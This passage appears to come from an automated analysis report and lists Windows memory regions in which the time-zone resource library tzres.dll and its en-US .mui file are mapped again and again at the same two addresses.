filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2950
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2951
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2952
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2953
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2954
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2955
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2956
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2957
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2958
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2959
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2960
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2961
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2962
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2963
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2964
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2965
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2966
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2967
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2968
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2969
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2970
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2971
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2972
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2973
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2974
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2975
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2976
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2977
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2978
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2979
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2980
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2981
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2982
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2983
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2984
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2985
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2986
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2987
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2988
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2989
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2990
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2991
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2992
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2993
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2994
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2995
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2996
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2997
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2998
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2999
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3000
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3001
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3002
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3003
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3004
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3005
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3006
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3007
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3008
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3009
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3010
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3011
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3012
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3013
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3014
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3015
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3016
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3017
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3018
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3019
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3020
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3021
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3022
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3023
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3024
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3025
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3026
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3027
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3028
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3029
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3030
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3031
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3032
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3033
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3034
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3035
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3036
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3037
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3038
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3039
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3040
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3041
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3042
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3043
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3044
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3045
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3046
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3047
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3048
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3049
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3050
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3051
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3052
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3053
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3054
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3055
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3056
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3057
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3058
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3059
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3060
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3061
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3062
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3063
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3064
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3065
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
